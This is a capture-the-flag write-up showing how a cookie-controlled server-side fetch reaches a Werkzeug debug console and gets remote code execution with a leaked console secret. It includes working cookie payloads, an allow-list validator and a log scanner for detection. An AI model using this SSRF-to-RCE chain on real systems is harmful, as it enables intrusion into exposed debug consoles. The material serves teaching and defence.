# Triskel 3: Dead End

## Problem

You are admin now... Anyway now you can't access any information or have more privileges so I guess it's the end of your journey haha!

by Remsio

## Solution

Looking at the cookies, we now see a `confidential_documents` value that looks like another "API call": a host and path that the server fetches on our behalf.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-6c4432837f7e2e8b477edfc6290cc00cdfbd9b68%2Fa33e065763d148fb9c505e2cf70655d2.png?alt=media)

We are told that the API is powered by Werkzeug, which includes a debugging console at `/console` if debugging is enabled.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-0f61ff65e1278734a1c917e47c7e10d1560c9d50%2F673321c7e0ef47eebacbbb0befcd6f08.png?alt=media)

The current cookie value points at the production server. If debugging is enabled anywhere, it is more likely to be on the development server.

Setting `confidential_documents=kontammadur_klanvour.dev.local%3A5001%2Fconsole` (the dev host on port 5001, path `/console`) brings back a Werkzeug console.
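Because the cookie value is handed to a server-side fetch, whoever controls the cookie chooses the target, which is what turns a document lookup into a path to the debugger. The allow-list check below is an added example written for this writeup, not code from the challenge or its author; the permitted host, port and path prefix are placeholders, and the rejected value is the dev-console cookie shown above.

```python
from urllib.parse import unquote, urlsplit

# Constructed policy (placeholders, not the challenge's real upstream): the
# only host, port and path prefix the document API may ever fetch from.
ALLOWED_HOSTS = {"documents.example.internal"}
ALLOWED_PORTS = {443}
ALLOWED_PATH_PREFIX = "/confidential/"


class TargetRejected(ValueError):
    """Raised when a cookie-supplied fetch target falls outside the policy."""


def resolve_document_target(cookie_value: str) -> str:
    """Turn the raw cookie value into a URL the server may fetch, or raise.

    The value is URL-decoded once and, because the challenge cookie carries no
    scheme, prefixed with https:// so urlsplit sees a host. Host, port, path
    and query are then checked against the allow-list. Anything outside it is
    rejected outright rather than rewritten, so a value such as
    host.dev.local:5001/console can never reach an internal debugger.
    """
    raw = unquote(cookie_value)
    parts = urlsplit(raw if "://" in raw else "https://" + raw)
    if parts.scheme != "https":
        raise TargetRejected(f"scheme {parts.scheme!r} not allowed")
    # hostname strips any user@ prefix, so "allowed.host@evil" resolves to "evil"
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        raise TargetRejected(f"host {host!r} not in allow-list")
    try:
        port = parts.port or 443
    except ValueError as exc:  # non-numeric port in the cookie
        raise TargetRejected("malformed port") from exc
    if port not in ALLOWED_PORTS:
        raise TargetRejected(f"port {port} not in allow-list")
    if not parts.path.startswith(ALLOWED_PATH_PREFIX) or ".." in parts.path:
        raise TargetRejected(f"path {parts.path!r} not under {ALLOWED_PATH_PREFIX}")
    if parts.query or parts.fragment:
        raise TargetRejected("query strings and fragments are not forwarded")
    return f"https://{host}:{port}{parts.path}"


def is_allowed(cookie_value: str) -> bool:
    """Yes/no wrapper around resolve_document_target for simple call sites."""
    try:
        resolve_document_target(cookie_value)
    except TargetRejected:
        return False
    return True


if __name__ == "__main__":
    for value in (
        "documents.example.internal%2Fconfidential%2Freport.pdf",  # constructed legitimate value
        "kontammadur_klanvour.dev.local%3A5001%2Fconsole",           # the writeup's pivot to the debugger
        "documents.example.internal%2Fconsole",                       # right host, wrong path
    ):
        print(f"{value!r}: {'allowed' if is_allowed(value) else 'rejected'}")
```

The check rejects rather than sanitises: a value that fails any test is dropped, not trimmed into something acceptable. It also does nothing about the deeper problem, which is that a debugger console is listening on the dev host at all.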

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-40ca3b9fdc967e465818030953d167198e2024de%2F2c50d3d872014ef19e25c0322a7e4845.png?alt=media)

The console's secret, which every command request must pass as the `s` parameter, is hardcoded in the page's JavaScript; the PIN prompt that recent Werkzeug releases place in front of the console is evidently not enforced here.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-4ec68a0c1d179c5022f2fa321f8b4bff49ad7ca8%2Faf3f82f79f20471c82e3f087dfa36b72.png?alt=media)

Hence we can craft the following cookie value, which makes the server submit a Python expression to the console and gives us RCE.

`confidential_documents=kontammadur_klanvour.dev.local%3A5001%2Fconsole?__debugger__=yes&cmd=__import__('os').listdir('/')%3b&frm=0&s=IUrsy36AKlZ2zvT1vaPc`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-f0a60214d536bfd0d390f9710d7542613b16755d%2F9c6ad07cf8f94dfcb3497ecf292be7d7.png?alt=media)

The listing shows `flag.txt` in `/`, so one more request with a read command returns the flag.
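On the dev host, the steps above leave a distinctive trail: a hit on `/console`, the console's static assets, then `__debugger__=yes` requests carrying a `cmd` value. The scanner below is an added example for this writeup, not code from the challenge; the log lines are constructed, the secret in them is replaced with a placeholder, and the treatment of `cmd=resource` as an asset load (rather than a command) follows Werkzeug's debugger behaviour.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined"-style line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample from the dev host's access log. The command in the last
# line is the one shown in the writeup; the secret is replaced by a placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [02/May/2021:14:03:11 +0000] "GET /confidential/report.pdf HTTP/1.1" 200 5120
10.0.0.5 - - [02/May/2021:14:03:40 +0000] "GET /console HTTP/1.1" 200 9876
10.0.0.5 - - [02/May/2021:14:03:41 +0000] "GET /console?__debugger__=yes&cmd=resource&f=style.css HTTP/1.1" 200 4011
10.0.0.5 - - [02/May/2021:14:04:02 +0000] "GET /console?__debugger__=yes&cmd=__import__('os').listdir('/')%3b&frm=0&s=SECRET_PLACEHOLDER HTTP/1.1" 200 310
""".splitlines()


def classify_target(target: str):
    """Return (kind, cmd) for a request-line target, or None if benign.

    kind is "console_reachable" when the console page itself or one of its
    static assets (cmd=resource) was served, which already proves the debugger
    is enabled on a reachable host; it is "console_command" when the request
    carried __debugger__=yes with any other cmd, i.e. Python handed to the
    console for evaluation (PIN attempts such as cmd=pinauth land here too).
    """
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/console":
        return None
    query = parse_qs(parts.query)  # percent-decodes, so %3b becomes ';'
    cmd = query.get("cmd", [None])[0]
    if query.get("__debugger__") == ["yes"] and cmd not in (None, "resource"):
        return ("console_command", cmd)
    return ("console_reachable", cmd)


def scan_access_log(lines):
    """Run classify_target over each line and collect findings in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        hit = classify_target(m["target"])
        if hit is None:
            continue
        kind, cmd = hit
        findings.append({
            "src": m["src"], "ts": m["ts"], "status": m["status"],
            "kind": kind, "cmd": cmd,
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        extra = f" cmd={f['cmd']!r}" if f["cmd"] else ""
        print(f"{f['ts']} {f['src']} {f['kind']}{extra}")
```

Any `console_reachable` finding on a host that is not a developer's workstation is worth acting on by itself: it means the application was started with the debugger on, and in this challenge the request's source address would be the document API rather than an attacker's machine, which is the server-side fetch showing up in the log.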

References:

* <https://www.netscylla.com/blog/2018/10/03/werkzeug-debugger.html>
